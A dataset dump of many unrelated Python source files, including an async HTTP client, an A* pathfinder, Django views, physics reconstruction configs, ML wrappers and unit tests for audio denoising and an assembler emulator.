"""This Class is a singleton that inherits from the `type` class, in order to provide it as a metaclass to other classes
This class is the core of the HTTP client that differs from others client, because it will allow to manage different
domains within the same class
This is very useful for example if you need to send request to different third party APIS and you want to follow the
way of that request with a same request ID.
With this class you can keep a domain registry. Every new domain will be registered to this class. On each new call,
it will check if the domain exists in the registry and if not il will
create and entry for it. Afterward it will set this domain as the current domain.
"""
def __init__(cls, *args, **kwargs):
cls.__instance = None
cls._locker = threading.Lock()
cls.endpoints_registry: Dict[bytes, EndPoint] = {}
cls.current = bytes()
super().__init__(*args, **kwargs)
def __call__(cls, *args, **kwargs):
"""
Instantiate the Singleton using the thread library in order to guarantee only one instance !
Arguments:
host: string, the domain's host
port: int : Optional
protocol : string, must be a member of the SupportedProtocol Enum
Returns:
cls.__instance : EndPointRegistry instance
"""
if cls.__instance is None:
with cls._locker:
if cls.__instance is None:
cls.__instance = super().__call__(*args, **kwargs)
# On each call : add to registry (if it is already in the reg, it wont be added but only defined as current)
cls.add_to_reg(**kwargs)
return cls.__instance
def add_to_reg(cls, **kwargs):
"""Method that will create and eventually add a class EndPoint instance object and will add it to the registry if its base64 url is not present in it
In that way, if there is the same origin with two different ports, it will be two different entry in the registry
Arguments:
host: string, the domain's host
port: int : Optional
protocol : string, must be a member of the SupportedProtocol Enum
"""
port = kwargs.get("port", None)
protocol = kwargs.get("protocol", None)
host = kwargs.get("host", None)
end_point = EndPoint(host, port, protocol)
if not end_point.base_url:
raise ValueError("EndPointRegistry error trying to add new client : host is missing")
try:
end_point_key = base64.b64encode(bytes(end_point.base_url, encoding='utf-8'))
if end_point_key not in cls.endpoints_registry:
cls.endpoints_registry[end_point_key] = end_point
cls.current = end_point_key
except TypeError as te:
raise TypeError(f"Cannot encode base url to registry : {str(te)}")
@dataclass
class EndPoint:
host: str
port: int
_protocol: str
@property
def base_url(self) -> Union[bool, str]:
"""Build the base url based on the protocol, the host and the port. Only host is mandatory, others will be ignored or given default value.
Returns:
The Base URL following this template "{protocol}://{host}:{port}"
"""
if not self.host:
return False
return f"{self.protocol.value}://{self.host}:{self.port}" if self.port \
else f"{self.protocol.value}://{self.host}"
@property
def protocol(self) -> SupportedProtocols:
"""Get the protocol if the one that was given in constructor is supported, otherwise give the default http protocol
Returns:
Entry of the enum SupportedProtocols
"""
if self._protocol in SupportedProtocols.__members__:
return SupportedProtocols[self._protocol]
return SupportedProtocols.http
class BaseRESTAsyncClient(metaclass=EndPointRegistry):
def __init__(self, *, host, port=None, protocol=None):
self._request_id = None
@classmethod
def get_instance(cls, *, host: str, port: Optional[int] = None,
protocol: Optional[str] = None) -> "partial[BaseRESTAsyncClient]":
"""Will return a factory (as a partial function) in order to always ensure the current endpoint is selected in the endpoints registry
Arguments:
host: domain's host
port: listening port
protocol: Network Protocol (must be a value of the SupportedProtocols Enum)
Returns:
partial function (BaseRESTAsyncClient factory)
Example:
```python
client = BaseRESTAsyncClient.get_instance("example.com", 8080, "https")
```
"""
return partial(BaseRESTAsyncClient, host=host, port=port, protocol=protocol)
@property
def request_id(self) -> str:
"""Getter for the request id
Returns:
nanoid: uid of the current request
"""
if not self._request_id:
return None
return str(self._request_id)
@request_id.setter
def request_id(self, req_id):
"""Setter for the request id
Arguments:
req_id : UID (nanoid) of the request
Todo:
* Check if there is any pre existing request ID from the incoming request headers and generate one ONLY IF there is no
"""
self._request_id = generate()
def get_base_url(self) -> str:
return self.endpoints_registry[self.current].base_url
def make_url(self, url: str = ""):
"""Url builder based on the host base url
Arguments:
url: relative url that will be concatenate wil the host base url
Returns:
string: An absolute url including the protocol, the host base url, port (if any) and the relative url if any
"""
# Ensure to remove keep only one "/" along all the url
url = re.sub('/+', '/', url)
# remove the first "/" at the beginning
url = re.sub('^/', '', url)
return f"{self.get_base_url()}/{url}"
async def _send_request(self, req: Request):
"""
Arguments:
req: a Request ([httpx](https://www.python-httpx.org/api/#request) type)
Returns:
coroutine: handle the HTTP response by awaiting it
"""
async with httpx.AsyncClient() as client:
return await client.send(req)
async def get(self,
url: URLTypes = "",
*,
params: QueryParamTypes = None,
headers: HeaderTypes = None,
cookies: CookieTypes = None):
"""Prepare an HTTP `GET` request and send it asynchronously
Arguments:
url: Relative URL (from the base URL)
params: Query string
headers: HTTP Headers (Key Value)
cookies: HTTP Cookies
Returns:
coroutine : result of the `_send_request` method. It need to be awaited in order to get the HTTP response
"""
request = Request(Methods.get.value, self.make_url(url), params=params, headers=headers, cookies=cookies)
return await self._send_request(request)
async def post(self,
url: URLTypes = "",
*,
headers: HeaderTypes = None,
cookies: CookieTypes = None,
content: RequestContent = None,
data: RequestData = None,
files: RequestFiles = None):
"""Prepare an HTTP `POST` request and send it asynchronously
Arguments:
url: Relative URL (from the base URL)
headers: HTTP Headers (Key Value)
cookies: HTTP Cookies
data: JSON, Files, Form,
content: All contents that are NOT one of : Form encoded, Multipart files, JSON. Could be use for text or binaries
files: Blob stream
Returns:
coroutine : result of the `_send_request` method. It need to be awaited in order to get the HTTP response
"""
request = Request(Methods.post.value, self.make_url(url),
content=content,
data=data,
files=files,
headers=headers,
cookies=cookies)
return await self._send_request(request)
async def put(self,
url: URLTypes = "",
*,
headers: HeaderTypes = None,
cookies: CookieTypes = None,
data: RequestData = None):
"""Prepare an HTTP `PUT` request and send it asynchronously
Arguments:
url: Relative URL (from the base URL)
headers: HTTP Headers (Key Value)
cookies: HTTP Cookies
data: JSON, Files, Form,
Returns:
coroutine : result of the `_send_request` method. It need to be awaited in order to get the HTTP response
"""
request = Request(Methods.put.value, self.make_url(url),
data=data,
headers=headers,
cookies=cookies)
return await self._send_request(request)
async def patch(self,
url: URLTypes = "",
*,
headers: HeaderTypes = None,
cookies: CookieTypes = None,
data: RequestData = None):
"""Prepare an HTTP `PATCH` request and send it asynchronously
Arguments:
url: Relative URL (from the base URL)
headers: HTTP Headers (Key Value)
cookies: HTTP Cookies
data: JSON, Files, Form,
Returns:
coroutine : result of the `_send_request` method. It need to be awaited in order to get the HTTP response
"""
request = Request(Methods.patch.value, self.make_url(url),
data=data,
headers=headers,
cookies=cookies)
return await self._send_request(request)
async def delete(self,
url: URLTypes = "",
*,
params: QueryParamTypes = None,
headers: HeaderTypes = None,
cookies: CookieTypes = None):
"""Prepare an HTTP `DELETE` request and send it asynchronously
Arguments:
url: Relative URL (from the base URL)
params: Query string
headers: HTTP Headers (Key Value)
cookies: HTTP Cookies
Returns:
coroutine : result of the `_send_request` method. It need to be awaited in order to get the HTTP response
"""
request = Request(Methods.delete.value, self.make_url(url), params=params, headers=headers, cookies=cookies)
return await self._send_request(request)
def __call__(self, *args, **kwargs):
"""
Will trow an error that avoid BaseRESTAsyncClient to be called directly and force use the get_instance class method
"""
raise TypeError("BaseClient cannot be called directly use get_instance class method instead")
async_client_factory = BaseRESTAsyncClient.get_instance
| StarcoderdataPython |
9658222 | import heapq
class Elem(object):
def __init__(self, x, y, reachable):
self.reachable = reachable
self.x = x
self.y = y
self.parent = None
self.g_cost = 0
self.h_cost = 0
self.f_cost = 0
class AStar(object):
def __init__(self, grid, start, end):
self.open_cells = []
heapq.heapify(self.open_cells)
self.closed = set()
self.cells = []
self.grid_height = len(grid)
self.grid_width = len(grid[0])
for x in xrange(len(grid[0])):
for y in xrange(len(grid)):
self.cells.append(Elem(x, y, 1-grid[y][x]))
self.start = self.get_elem(*start)
self.end = self.get_elem(*end)
def get_elem(self, x, y):
return self.cells[x * self.grid_height + y]
def solve(self):
heapq.heappush(self.open_cells, (self.start.f_cost, self.start))
while len(self.open_cells):
f, cell = heapq.heappop(self.open_cells)
self.closed.add(cell)
if cell is self.end:
cell = self.end
path = [(cell.x, cell.y)]
while cell.parent is not self.start:
cell = cell.parent
path.append((cell.x, cell.y))
path.append((self.start.x, self.start.y))
path.reverse()
return path
adj_cells = []
if cell.x < self.grid_width-1:
adj_cells.append(self.get_elem(cell.x+1, cell.y))
if cell.y > 0:
adj_cells.append(self.get_elem(cell.x, cell.y-1))
if cell.x > 0:
adj_cells.append(self.get_elem(cell.x-1, cell.y))
if cell.y < self.grid_height-1:
adj_cells.append(self.get_elem(cell.x, cell.y+1))
for adj_cell in adj_cells:
if adj_cell.reachable == 1 and adj_cell not in self.closed:
if (adj_cell.f_cost, adj_cell) in self.open_cells:
if adj_cell.g_cost > cell.g_cost + 10:
adj_cell.g_cost = cell.g_cost + 10
adj_cell.h_cost = (abs(cell.x - self.end.x) + abs(cell.y - self.end.y))
adj_cell.parent = cell
adj_cell.f_cost = adj_cell.h_cost + adj_cell.g_cost
else:
adj_cell.g_cost = cell.g_cost + 10
adj_cell.h_cost = (abs(cell.x - self.end.x) + abs(cell.y - self.end.y))
adj_cell.parent = cell
adj_cell.f_cost = adj_cell.h_cost + adj_cell.g_cost
heapq.heappush(self.open_cells, (adj_cell.f_cost, adj_cell))
if __name__ == "__main__":
map_arr = [[0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0],
[0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0],
[0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0],
[0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1],
[0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1],
[0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,1],
[0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0],
[0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,1,1,0],
[0,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0,1,1,1,1,0],
[0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,1,1,1]]
astar = AStar(map_arr,(1,11),(13,1))
path = astar.solve()
for i in xrange(len(map_arr)):
for j in xrange(len(map_arr[0])):
if (j,i) in path:
print '*',
else:
print map_arr[i][j],
print | StarcoderdataPython |
3432699 | import pytest
import dowhy.datasets
from dowhy import CausalModel
class TestCausalModel(object):
@pytest.mark.parametrize(["beta", "num_instruments", "num_samples"],
[(10, 1, 100),])
def test_graph_input(self, beta, num_instruments, num_samples):
num_common_causes = 5
data = dowhy.datasets.linear_dataset(beta=beta,
num_common_causes=num_common_causes,
num_instruments=num_instruments,
num_samples=num_samples,
treatment_is_binary=True)
model = CausalModel(
data=data['df'],
treatment=data["treatment_name"],
outcome=data["outcome_name"],
graph=data["gml_graph"],
proceed_when_unidentifiable=True,
test_significance=None
)
# removing two common causes
gml_str = 'graph[directed 1node[ id "v" label "v"]node[ id "y" label "y"]node[ id "Unobserved Confounders" label "Unobserved Confounders"]edge[source "v" target "y"]edge[source "Unobserved Confounders" target "v"]edge[source "Unobserved Confounders" target "y"]node[ id "X0" label "X0"] edge[ source "X0" target "v"] node[ id "X1" label "X1"] edge[ source "X1" target "v"] node[ id "X2" label "X2"] edge[ source "X2" target "v"] edge[ source "X0" target "y"] edge[ source "X1" target "y"] edge[ source "X2" target "y"] node[ id "Z0" label "Z0"] edge[ source "Z0" target "v"]]'
model = CausalModel(
data=data['df'],
treatment=data["treatment_name"],
outcome=data["outcome_name"],
graph=gml_str,
proceed_when_unidentifiable=True,
test_significance=None,
missing_nodes_as_confounders=True
)
assert all(node_name in model._common_causes for node_name in ["X3", "X4"])
| StarcoderdataPython |
4882284 | <filename>pages/views.py
from django.shortcuts import render
from schedule.models import Routine,Schedule
from schedule.views import get_routine
from academicnotice.models import AcademicNotice
from ClassNotice.models import ClassNotice
from Assignments.models import Assignments
# Create your views here.
def HomePageView(request):
day = Schedule.objects.all()[0]
context = {
"day":day,
}
routine = get_routine(str(day))
context["routine"] = routine
academic_notices = AcademicNotice.objects.all()
context["academic_notices"] = academic_notices
class_notices = ClassNotice.objects.all()
context["class_notices"] = class_notices
assignments = Assignments.objects.all()[:4]
context["assignments"] = assignments
return render(request,'home.html',context)
| StarcoderdataPython |
1720472 | <reponame>ankur198/TravelLite
# Generated by Django 2.0.4 on 2018-05-07 05:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('travellite', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='hotel',
name='companyName',
field=models.CharField(default='hotel', max_length=30),
),
]
| StarcoderdataPython |
3204172 | from .academicIO import AnalogInput, AnalogOutput, DigitalInputOutput, Encoder, PWM, LEDs, I2C, SPI, ButtonIRQ, DIIRQ, AIIRQ, TimerIRQ, UART, Button
from .enums import * | StarcoderdataPython |
3388382 | <gh_stars>0
# Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_md.gromacs.grompp import Grompp # Importing class instead of module to avoid name collision
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
@task(input_gro_path=FILE_IN, input_top_zip_path=FILE_IN, output_tpr_path=FILE_OUT, input_cpt_path=FILE_IN, input_ndx_path=FILE_IN, input_mdp_path=FILE_IN,
on_failure="IGNORE", time_out=task_time_out)
def _grompp(input_gro_path, input_top_zip_path, output_tpr_path, input_cpt_path, input_ndx_path, input_mdp_path, properties, **kwargs):
task_config.pop_pmi(os.environ)
try:
Grompp(input_gro_path=input_gro_path, input_top_zip_path=input_top_zip_path, output_tpr_path=output_tpr_path, input_cpt_path=input_cpt_path, input_ndx_path=input_ndx_path, input_mdp_path=input_mdp_path, properties=properties, **kwargs).launch()
except Exception as e:
traceback.print_exc()
raise e
finally:
sys.stdout.flush()
sys.stderr.flush()
def grompp(input_gro_path, input_top_zip_path, output_tpr_path, input_cpt_path=None, input_ndx_path=None, input_mdp_path=None, properties=None, **kwargs):
if (output_tpr_path is None or os.path.exists(output_tpr_path)) and \
True:
print("WARN: Task Grompp already executed.")
else:
_grompp( input_gro_path, input_top_zip_path, output_tpr_path, input_cpt_path, input_ndx_path, input_mdp_path, properties, **kwargs) | StarcoderdataPython |
1603879 | from multiprocessing import Process
import os
import time
# git remote set-url origin https://mgrecu35@github.com/mgrecu35/cmbv7.git
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def fsh(fname):
cmb1=fname.split('.')[-4:]
cmb1out="out/cmb."+cmb1[0]+"."+cmb1[1]+"."+cmb1[3]
cmd='bpsh 245 ./combAlg.exe %s %s>&out/out.%s'%(fname,cmb1out,cmb1[1])
print(cmd)
os.system(cmd)
time.sleep(1)
import glob
if __name__ == '__main__':
#
for iday in range(1,2):
iday=1
fs=glob.glob("/gpmdata/2018/08/%2.2i/radar/2A.GPM.DPR.V8*"%iday)
fs=sorted(fs)
jobs=[]
t1=time.time()
if iday==1:
t11=t1
for f in fs:
p = Process(target=fsh, args=(f,))
jobs.append(p)
p.start()
for j in jobs:
j.join()
print('all done')
print(time.time()-t1)
print(time.time()-t11)
| StarcoderdataPython |
4900986 | import hashlib
from hvm import constants
from hvm.utils.numeric import (
ceil32,
)
def sha256(computation):
word_count = ceil32(len(computation.msg.data)) // 32
gas_fee = constants.GAS_SHA256 + word_count * constants.GAS_SHA256WORD
computation.consume_gas(gas_fee, reason="SHA256 Precompile")
input_bytes = computation.msg.data
hash = hashlib.sha256(input_bytes).digest()
computation.output = hash
return computation
| StarcoderdataPython |
5003278 | from sklearn import preprocessing
from xgboost import XGBClassifier
from classifiers.abs_classifier import ABSClassifier
class XGBoostScaledOptuna(ABSClassifier):
def __init__(self):
self.clf = XGBClassifier(booster="dart",
alpha=2.1585186469130006e-06,
max_depth=9,
eta=1.2008186006089662e-05,
gamma=2.6586554392733573e-06,
grow_policy="lossguide",
sample_type="uniform",
normalize_type="forest",
rate_drop=0.6820563384069672,
skip_drop=0.05004706702962791,
reg_lambda=0.33733524039826585)
self.scaler = preprocessing.StandardScaler()
self.is_trained = False
def train(self, X_train, y_train, X_val=None, y_val=None):
X_train_scaled = self.scaler.fit_transform(X_train)
self.clf.fit(X_train_scaled, y_train)
self.is_trained = True
# Output accuracy of classifier
print("Training Score: \t{:.5f}".format(self.clf.score(X_train_scaled, y_train)))
X_val_scaled = self.scaler.transform(X_val)
print("Validation Score: \t{:.5f}".format(self.clf.score(X_val_scaled, y_val)))
def predict(self, X):
if self.is_trained is False:
print("WARN: RFScaled was not trained but predict was called")
X_scaled = self.scaler.transform(X)
return self.clf.predict(X_scaled)
| StarcoderdataPython |
220483 | # точка в правоъгълник
# Проверка дали точка {x, y} се намира вътре в правоъгълника {x1, y1} – {x2, y2}. Входните данни се четат от конзолата и се състоят от 6 реда:
# десетичните числа x1, y1, x2, y2, x и y (като се гарантира, че x1 < x2 и y1 < y2).
x1 = float(input())
y1 = float(input())
x2 = float(input())
y2 = float(input())
x = float(input())
y = float(input())
if x1 <= x <= x2 and y1 <= y <= y2:
print('Inside')
else:
print('Outside') | StarcoderdataPython |
353550 | import argparse
import os
description="""
Quick-and-dirty way of simulating a beam profile by using an arbitrary
number of processed. The principle of operation is to divide the discrete
simulation grid into N equal sizes (outer index).
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=description)
parser.add_argument("h5_base", help="Base part of HDF5 files (or final output if only one CPU) [without .h5]")
parser.add_argument("matlab_exe", help="Path to Matlab executable")
parser.add_argument("matlab_script", help="Name of .m simulation script")
parser.add_argument("--x_min", type=float, default=-2e-2)
parser.add_argument("--x_max", type=float, default=2e-2)
parser.add_argument("--num_x", type=int, default=8)
parser.add_argument("--y_min", type=float, default=-2e-2)
parser.add_argument("--y_max", type=float, default=2e-2)
parser.add_argument("--num_y", type=int, default=8)
parser.add_argument("--z_min", type=float, default=1e-3)
parser.add_argument("--z_max", type=float, default=160e-3)
parser.add_argument("--num_z", type=float, default=32)
parser.add_argument("--num_processes", help="Number of processes to split (=num CPUs to use)", type=int, default=1)
args = parser.parse_args()
# create Matlab code for creating geometry struct.
struct_str = "struct('x_min',%e,'x_max',%e,'num_x',%d,'y_min',%e,'y_max',%e,'num_y',%d,'z_min',%e,'z_max',%e,'num_z',%d)"\
% (args.x_min,args.x_max,args.num_x,args.y_min,args.y_max,args.num_y,args.z_min,args.z_max,args.num_z)
for job_no in range(args.num_processes):
cur_h5_out = "%s_%d_of_%d.h5" % (args.h5_base, job_no+1, args.num_processes)
cmd = "%s -nosplash -nodesktop -r \"%s(%s, '%s', [%d,%d]);exit;\" " % (args.matlab_exe, args.matlab_script, struct_str, cur_h5_out, args.num_processes, job_no+1)
print "=== JOB %d ===" % job_no
print cmd
os.system(cmd)
| StarcoderdataPython |
6575815 | <reponame>readerbench/ReaderBench<gh_stars>1-10
from enum import Enum, auto
from rb.core.pos_features.pos_feature import POSFeature
from rb.core.pos_features.ro_pos_features.ro_features_name import RoFeaturesName
from rb.core.lang import Lang
from rb.core.pos import POS
from typing import List
import re
class RoNumTypeEnum(Enum):
CARD = auto()
ORD = auto()
class RoPOSFeatureNumType(POSFeature):
_INSTANCE = None
def __init__(self):
POSFeature.__init__(self, lang=Lang.RO, name=RoFeaturesName.NRT,
values=None, pos_supported=None)
self.values = set([ro_nr_type for _, ro_nr_type in RoNumTypeEnum.__members__.items()])
self.pos_supported = set([POS.NUM])
@classmethod
def get_instance(cls) -> "RoPOSFeatureNumType":
if cls._INSTANCE is None:
cls._INSTANCE = RoPOSFeatureNumType()
return cls._INSTANCE
def get_values(self, tag: str) -> List[RoNumTypeEnum]:
pattern = '(NumType=[a-zA-Z,]*){1}'
matches = re.findall(pattern, tag)
if len(matches) == 0: return []
nr_forms = matches[0].split('=')[1].split(',')
values = []
for nr_form in nr_forms:
if nr_form == 'Card':
values.append(RoNumTypeEnum.CARD)
elif nr_form == 'Ord':
values.append(RoNumTypeEnum.ORD)
return values | StarcoderdataPython |
9747614 | <filename>DeepFilterNet/df/scripts/test_df.py
#!/usr/bin/env python
import os
import unittest
from typing import Dict, List, Union
import numpy as np
import torch
from loguru import logger
import df
from df.enhance import DF, enhance, init_df, load_audio
from df.evaluation_utils import composite, si_sdr_speechmetrics, stoi
__a_tol = 1e-4
def eval_composite(clean, enhanced, sr, m_target: List[float]): # type: ignore
logger.info("Computing composite metrics")
try:
m_enh_octave = torch.as_tensor(
composite(clean.squeeze(0).numpy(), enhanced.squeeze(0).numpy(), sr, use_octave=True)
).to(torch.float32)
except (OSError, ImportError, ModuleNotFoundError):
m_enh_octave = None
logger.warning("No octave available")
m_enh = torch.as_tensor(
composite(clean.squeeze(0).numpy(), enhanced.squeeze(0).numpy(), sr)
).to(torch.float32)
logger.info(f"Got {m_enh}")
m_target: torch.Tensor = torch.as_tensor(m_target)
assert torch.isclose(
m_enh, m_target, atol=__a_tol
).all(), f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
if m_enh_octave is not None:
assert torch.isclose(
m_enh_octave, m_target, atol=__a_tol
).all(), (
f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
)
def eval_pystoi(clean, enhanced, sr, m_target: float):
logger.info("Computing STOI")
m_enh = stoi(clean.squeeze(0), enhanced.squeeze(0), sr)
logger.info(f"Got {m_enh}")
assert np.isclose(
[m_enh], [m_target], atol=__a_tol
), f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
def eval_sdr(clean, enhanced, m_target: float):
logger.info("Computing SI-SDR")
m_enh = si_sdr_speechmetrics(clean.numpy(), enhanced.numpy())
logger.info(f"Got {m_enh}")
assert np.isclose(
[m_enh], [m_target]
), f"Metric output not close. Expected {m_target}, got {m_enh}, diff: {m_target-m_enh}"
TARGET_METRICS = {
"DeepFilterNet": {
"composite": [
2.30728650093078,
3.83064246177673,
2.36408281326293,
3.05453467369079,
-2.7631254196166,
],
"stoi": 0.9689496585281197,
"sdr": 18.88543128967285,
},
"DeepFilterNet2a": {
"composite": [
2.86751246452332,
4.03339815139771,
2.56429362297058,
3.41470885276794,
-2.79574084281921,
],
"stoi": 0.9707452525900906,
"sdr": 13.40160727500915,
},
"DeepFilterNet2b": {
"composite": [
2.87229919433594,
4.15724086761475,
2.62931561470032,
3.48965477943420,
-2.28056311607361,
],
"stoi": 0.9733591821902137,
"sdr": 13.59861135482788,
},
}
def _load_model(df_dir: str, model_n: str):
model_base_dir = os.path.join(df_dir, "pretrained_models", model_n)
model, df_state, _ = init_df(model_base_dir, config_allow_defaults=True)
logger.info(f"Loaded model {model_n}")
return model, df_state
class TestDfModels(unittest.TestCase):
@classmethod
def setUpClass(cls):
torch.set_printoptions(precision=14, linewidth=120)
cls.df_dir = os.path.abspath(os.path.join(os.path.dirname(df.__file__), os.pardir))
cls.models = {m: _load_model(cls.df_dir, m) for m in TARGET_METRICS.keys()}
return cls
def _test_model(
self,
model: torch.nn.Module,
df_state: DF,
target_metrics: Dict[str, Union[float, List[float]]],
):
sr = df_state.sr()
logger.info("Loading audios")
noisy, _ = load_audio(
os.path.join(self.df_dir, os.path.pardir, "assets", "noisy_snr0.wav"), sr
)
clean, _ = load_audio(
os.path.join(self.df_dir, os.path.pardir, "assets", "clean_freesound_33711.wav"), sr
)
enhanced = enhance(model, df_state, noisy, pad=True)
eval_composite(clean, enhanced, sr, target_metrics["composite"]) # type: ignore
eval_pystoi(clean, enhanced, sr, m_target=target_metrics["stoi"]) # type: ignore
eval_sdr(clean, enhanced, m_target=target_metrics["sdr"]) # type: ignore
def test_deepfilternet(self):
model = "DeepFilterNet"
self._test_model(*self.models[model], target_metrics=TARGET_METRICS[model])
def test_deepfilternet2a(self):
model = "DeepFilterNet2a"
self._test_model(*self.models[model], target_metrics=TARGET_METRICS[model])
def test_deepfilternet2(self):
model = "DeepFilterNet2b"
self._test_model(*self.models[model], target_metrics=TARGET_METRICS[model])
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
156573 | import math
t = int(input())
result = []
for _ in range(t):
T1,T2,R1,R2 = map(int, input().split())
if ((math.pow(T1,2)/math.pow(R1,3)) == (math.pow(T2,2)/math.pow(R2,3))):
result.append("Yes")
else:
result.append("No")
print(*result, sep = "\n") | StarcoderdataPython |
247704 | <reponame>pasmuss/cmssw<filename>RecoMuon/Configuration/python/RecoMuonPPonly_cff.py
import FWCore.ParameterSet.Config as cms
# Seed generator
from RecoMuon.MuonSeedGenerator.standAloneMuonSeeds_cff import *
# Stand alone muon track producer
from RecoMuon.StandAloneMuonProducer.standAloneMuons_cff import *
# refitted stand-alone muons.
refittedStandAloneMuons = standAloneMuons.clone()
refittedStandAloneMuons.STATrajBuilderParameters.DoRefit = True
# Displaced SA muons
from RecoMuon.MuonSeedGenerator.CosmicMuonSeedProducer_cfi import *
displacedMuonSeeds = CosmicMuonSeed.clone()
displacedMuonSeeds.ForcePointDown = False
displacedStandAloneMuons = standAloneMuons.clone()
displacedStandAloneMuons.InputObjects = cms.InputTag("displacedMuonSeeds")
displacedStandAloneMuons.MuonTrajectoryBuilder = cms.string("StandAloneMuonTrajectoryBuilder")
displacedStandAloneMuons.TrackLoaderParameters.VertexConstraint = cms.bool(False)
# Global muon track producer
from RecoMuon.GlobalMuonProducer.GlobalMuonProducer_cff import *
from RecoMuon.Configuration.iterativeTkDisplaced_cff import *
displacedGlobalMuons = globalMuons.clone()
displacedGlobalMuons.MuonCollectionLabel = cms.InputTag("displacedStandAloneMuons","")
displacedGlobalMuons.TrackerCollectionLabel = cms.InputTag("displacedTracks")
# TeV refinement
from RecoMuon.GlobalMuonProducer.tevMuons_cfi import *
# SET Muon tracking
from RecoMuon.Configuration.SETRecoMuon_cff import *
# Muon Id producer
from RecoMuon.MuonIdentification.muonIdProducerSequence_cff import *
muons1stStep.fillGlobalTrackQuality = True
#Muon Id isGood flag ValueMap producer sequence
from RecoMuon.MuonIdentification.muonSelectionTypeValueMapProducer_cff import *
# Muon Isolation sequence
from RecoMuon.MuonIsolationProducers.muIsolation_cff import *
# ---------------------------------------------------- #
################## Make the sequences ##################
# ---------------------------------------------------- #
# Muon Tracking sequence
standalonemuontracking = cms.Sequence(standAloneMuonSeeds*standAloneMuons*refittedStandAloneMuons*displacedMuonSeeds*displacedStandAloneMuons)
displacedGlobalMuonTracking = cms.Sequence(iterDisplcedTracking*displacedGlobalMuons)
globalmuontracking = cms.Sequence(globalMuons*tevMuons*displacedGlobalMuonTracking)
muontracking = cms.Sequence(standalonemuontracking*globalmuontracking)
# Muon Reconstruction
muonreco = cms.Sequence(muontracking*muonIdProducerSequence)
# Muon Reconstruction plus Isolation
muonreco_plus_isolation = cms.Sequence(muonreco*muIsolation)
muonrecoComplete = cms.Sequence(muonreco_plus_isolation*muonSelectionTypeSequence)
# _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- #
# -_-_-_- Special Sequences for Iterative tracking -_-_-_- #
# -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ #
# We need to split the muon sequence above in two, to be able to run the MuonSeeding in the tracker. So muonrecoComplete will
# be run no longer...
#from RecoMuon.MuonIdentification.earlyMuons_cfi import earlyMuons
muonGlobalReco = cms.Sequence(globalmuontracking*muonIdProducerSequence*muonSelectionTypeSequence*muIsolation)
# ... instead, the sequences will be run in the following order:
# 1st - standalonemuontracking
# 2nd - iterative tracking (def in RecoTracker config)
# 3rd - MuonIDProducer with 1&2 as input, with special replacements; the earlyMuons above.
# 4th - MuonSeeded tracks, inside-out and outside-in
# 5th - Merging of the new TK tracks into the generalTracks collection
# 6th - Run the remnant part of the muon sequence (muonGlobalReco)
########################################################
from RecoMuon.MuonIdentification.me0MuonReco_cff import *
_phase2_muonGlobalReco = muonGlobalReco.copy()
_phase2_muonGlobalReco += me0MuonReco
phase2_muon.toReplaceWith( muonGlobalReco, _phase2_muonGlobalReco )
| StarcoderdataPython |
3260224 | import os
import unittest
from tests.config_reader import read_tpc_config
from wbtools.lib.nlp.literature_index.textpresso import TextpressoLiteratureIndex
@unittest.skipIf(not os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "data",
"local_config", "textpresso.cfg")),
"Textpresso test config file not present")
class TestTextpressoLiteratureIndex(unittest.TestCase):
def setUp(self) -> None:
config = read_tpc_config()
self.lit_index = TextpressoLiteratureIndex(api_url=config["tpc"]["api_base_url"],
api_token=config["tpc"]["api_token"], use_cache=True,
corpora=[config["tpc"]["corpora"]])
def test_num_documents(self):
self.assertGreater(self.lit_index.num_documents(), 0)
self.assertGreater(self.lit_index.num_documents(), 0)
def test_count_matching_documents(self):
count = self.lit_index.count_matching_documents("DREAM complex")
self.assertGreater(count, 0)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
8057235 | <gh_stars>10-100
from .utils import execute_code
def test_LDA_LDM():
program = '''
.data
.teststr string 'Hello'
.testnum 20
.memory_loc 500
.text
.global main:
main:
LDV A, .testnum
LDM A, .memory_loc
LDA B, .memory_loc
HLT
'''
c = execute_code(program)
assert c.registers.get(1) == 20
assert c.RAM.get(500) == 20
def test_LDR():
program = '''
.data
.teststr string 'ABCDEF'
.text
.global main:
main:
LDV A, .teststr
LDR B, A
HLT
'''
c = execute_code(program)
